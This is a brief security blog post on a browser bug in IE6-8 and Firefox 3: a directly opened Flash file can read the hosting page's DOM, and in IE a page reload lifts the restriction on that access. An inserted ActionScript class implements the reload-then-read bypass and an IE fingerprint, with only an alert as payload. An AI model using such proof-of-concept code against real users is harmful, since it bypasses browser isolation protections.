Author: Thorn
Although IE gets a lot of criticism, in some security respects it does quite well.
For example, IE blocks third-party cookies set from inside an iframe by default, and IE implements a security attribute on iframe (security="restricted"). Firefox has neither feature.
Today we look at another security problem.
If you open a .swf file directly in the browser, the browser automatically wraps it in an embed tag.
For example, when you open http://www.fvck.com/svck.swf directly:
In Firefox (tested with Firefox 3.0.3), the page source is:
<embed height="100%" width="100%" name="plugin" src="http://www.fvck.com/svck.swf" type="application/x-shockwave-flash"/>
In IE (tested with IE7), res://mshtml.dll/objectembed_neutral.js is invoked automatically to generate the wrapper page. The page code is:
Note that neither of these embed tags sets the AllowScriptAccess attribute.
Since Flash 8, the default value of allowScriptAccess is sameDomain. My Flash Player version is 9.0.124, so here it is also sameDomain. Because the wrapper page has the same origin as the .swf itself, svck.swf can access the JavaScript and DOM objects of the current HTML page.
In IE, the automatically generated page is evidently considered unsafe, so IE does one thing: it restricts this Flash movie from accessing the document object of the current window.
That is good, but IE actually has a bug here (in IE6, IE7 and the IE8 betas):
After the page is refreshed, the document object that was originally restricted can be accessed!
After refreshing the page with a simple F5:
Firefox is even worse: there is no restriction at all from the very beginning.
So how can we use this feature, or rather this bug?
In the Flash movie's ActionScript, directly call
window.location.reload();
to refresh the current page, after which the document object of the current page can be accessed.
Here you can also catch the exception raised when accessing document from AS to determine whether the browser is IE, which serves as a fingerprint as well.
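The steps above as an ActionScript 3 class, written as an added example for this post and not the author's svck.swf: it probes document through ExternalInterface, treats a refused access as the IE restriction (and therefore as an IE fingerprint), reloads the page once, and reads the document after the reload. The class name Svck, the alert-based reporting and the SharedObject flag used to avoid a reload loop are my choices; the assumption that a refused access shows up either as an ActionScript exception or as a null return from the bridge is mine, not something the post states.

```actionscript
package {
    import flash.display.Sprite;
    import flash.external.ExternalInterface;
    import flash.net.SharedObject;

    // Hypothetical SWF (added example, not the author's file). It is opened
    // directly, e.g. http://www.fvck.com/svck.swf, so it runs inside the
    // browser-generated <embed> page with the default allowScriptAccess
    // ("sameDomain"), which is what lets it reach the page's JavaScript.
    public class Svck extends Sprite {
        public function Svck() {
            if (!ExternalInterface.available) {
                return;
            }
            var html:String = readDocument();
            if (html != null) {
                // Firefox (no restriction at all) or IE after the reload:
                // the wrapper page's document is readable from the SWF.
                ExternalInterface.call("alert", "document reachable:\n" + html.substr(0, 200));
                return;
            }
            // Access was refused: this is IE's restriction on the auto-generated
            // page, which doubles as an IE fingerprint. Reload once; after the
            // reload the restriction is gone. The SharedObject flag lives in
            // Flash-side local storage (not the DOM), so it survives the reload
            // and prevents an endless reload loop in a browser that blocks
            // access permanently.
            var so:SharedObject = SharedObject.getLocal("svck");
            if (so.data.reloaded) {
                return;
            }
            so.data.reloaded = true;
            so.flush();
            ExternalInterface.call("window.location.reload");
        }

        // Try to read the wrapper page's DOM through the JavaScript bridge.
        // Returns null when the access is refused, whether that surfaces as an
        // ActionScript exception or as a null result from the JS side
        // (assumption: either form signals the restriction described above).
        private function readDocument():String {
            try {
                var r:* = ExternalInterface.call(
                    "function(){ return document.documentElement.outerHTML; }");
                return r == null ? null : String(r);
            } catch (e:Error) {
                return null;
            }
        }
    }
}
```

The first run in IE falls into the reload branch; the second run, and any run in Firefox, reaches the alert. On a browser where the access stays blocked, the flag stops the class after a single reload instead of refreshing forever.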
The bug discoverer's original post is here.